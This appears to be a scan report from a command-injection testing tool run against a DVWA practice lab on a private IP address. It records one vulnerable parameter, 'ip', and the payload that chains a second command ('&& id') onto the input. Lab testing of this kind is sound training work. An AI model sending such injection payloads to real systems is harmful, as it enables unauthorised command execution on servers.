=======================================================
=========Command Injector V2.0 - Scan Report===========
=======================================================
=======Educational Purposes Only -DVWA/BWAPP LABS======
=======Target: OWASP A03:2021 - INJECTIONS=============
=======================================================
Scan Date : Mon May 11 16:36:12 2026
Target URL: http://192.168.100.135/vulnerabilities/exec/
Target IP : 192.168.100.135
================================================

---------------------------------------------
Parameter: ip
Payload: 192.168.100.135+%26%26+id
Status: VULNERABLE
Details: Signature found: uid=
---------------------------------------------

